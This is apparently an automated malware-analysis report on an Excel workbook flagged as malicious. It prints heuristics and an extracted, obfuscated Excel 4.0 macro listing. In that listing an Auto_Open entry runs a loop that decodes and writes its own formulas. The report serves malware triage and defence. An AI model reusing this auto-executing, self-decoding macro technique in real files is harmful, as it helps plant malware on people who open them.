MALICIOUS
Risk Score: 140

Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6642 bytes |

SHA-256: ac2c596f849fc23a7f33dac6531b588d81af55b692b834cdf58fdb0ae09a6eb1

Preview script: first 1,000 lines of the extracted script

' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - eUsgjaOEu
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B184
' 0018 26 LABEL : Cell Value, String Constant - coczBdQhUJL len=0
' 0018 27 LABEL : Cell Value, String Constant - DPwThitFdBtj len=0
' 0018 27 LABEL : Cell Value, String Constant - EalXFQbDOJQu len=0
' 0018 20 LABEL : Cell Value, String Constant - fEnfD len=0
' 0018 26 LABEL : Cell Value, String Constant - FsJaepTWRyO len=0
' 0018 23 LABEL : Cell Value, String Constant - GBgYysqd len=0
' 0018 22 LABEL : Cell Value, String Constant - gKHEPNy len=0
' 0018 24 LABEL : Cell Value, String Constant - gNJvWVfsE len=0
' 0018 23 LABEL : Cell Value, String Constant - hYFACSQR len=0
' 0018 25 LABEL : Cell Value, String Constant - IveyTdMCUG len=0
' 0018 23 LABEL : Cell Value, String Constant - Knarindu len=0
' 0018 21 LABEL : Cell Value, String Constant - NZWTQe len=0
' 0018 21 LABEL : Cell Value, String Constant - OCerCD len=0
' 0018 22 LABEL : Cell Value, String Constant - PvlqjOj len=0
' 0018 20 LABEL : Cell Value, String Constant - rJURm len=0
' 0018 23 LABEL : Cell Value, String Constant - SHoVGltv len=0
' 0018 27 LABEL : Cell Value, String Constant - TwPIJPMiBiCP len=0
' 0018 23 LABEL : Cell Value, String Constant - UhdFSEFo len=0
' 0018 27 LABEL : Cell Value, String Constant - USUOFgCJutQY len=0
' 0018 21 LABEL : Cell Value, String Constant - XfYeot len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' eUsgjaOEu,B88,"SET.NAME("XfYeot",VALUE("0"))",""
' eUsgjaOEu,B91,"SET.NAME("OCerCD",XfYeot)",""
' eUsgjaOEu,B96,"SET.NAME("EalXFQbDOJQu",XfYeot)",""
' eUsgjaOEu,B101,"SET.NAME("TwPIJPMiBiCP",COUNTA(gNJvWVfsE))",""
' eUsgjaOEu,B103,"SET.NAME("Knarindu",COUNTA(USUOFgCJutQY))",""
' eUsgjaOEu,B106,[],""
' eUsgjaOEu,B111,"SET.NAME("SHoVGltv","")",""
' eUsgjaOEu,B113,"OCerCD",""
' eUsgjaOEu,B115,"SET.NAME("DPwThitFdBtj",HLOOKUP("*",gNJvWVfsE,OCerCD,FALSE))",""
' eUsgjaOEu,B118,"NZWTQe",""
' eUsgjaOEu,B121,"SET.NAME("hYFACSQR",XfYeot)",""
' eUsgjaOEu,B125,[],""
' eUsgjaOEu,B130,"hYFACSQR",""
' eUsgjaOEu,B135,"rJURm",""
' eUsgjaOEu,B138,"GBgYysqd",""
' eUsgjaOEu,B142,"gKHEPNy",""
' eUsgjaOEu,B145,"SET.NAME("fEnfD",VALUE(HLOOKUP("*",USUOFgCJutQY,gKHEPNy,FALSE)))",""
' eUsgjaOEu,B150,"UhdFSEFo",""
' eUsgjaOEu,B154,"SHoVGltv",""
' eUsgjaOEu,B157,"EalXFQbDOJQu",""
' eUsgjaOEu,B159,NEXT(),""
' eUsgjaOEu,B164,"coczBdQhUJL",""
' eUsgjaOEu,B169,"SET.NAME("f",INT(T(FORMULA(T(SHoVGltv)&"",""&T(coczBdQhUJL)))))",""
' eUsgjaOEu,B172,"FsJaepTWRyO",""
' eUsgjaOEu,B177,NEXT(),""
' eUsgjaOEu,B180,RETURN(),""
' eUsgjaOEu,B212,"SET.NAME("PvlqjOj",B88)",""
' eUsgjaOEu,B214,"gNJvWVfsE",""
' eUsgjaOEu,B217,"SET.NAME("USUOFgCJutQY",R66C15)",""
' eUsgjaOEu,B220,"SET.NAME("FsJaepTWRyO",229)",""
' eUsgjaOEu,B224,"SET.NAME("IveyTdMCUG",2)",""
' eUsgjaOEu,B228,PvlqjOj(),""
' eUsgjaOEu,B229,HALT(),""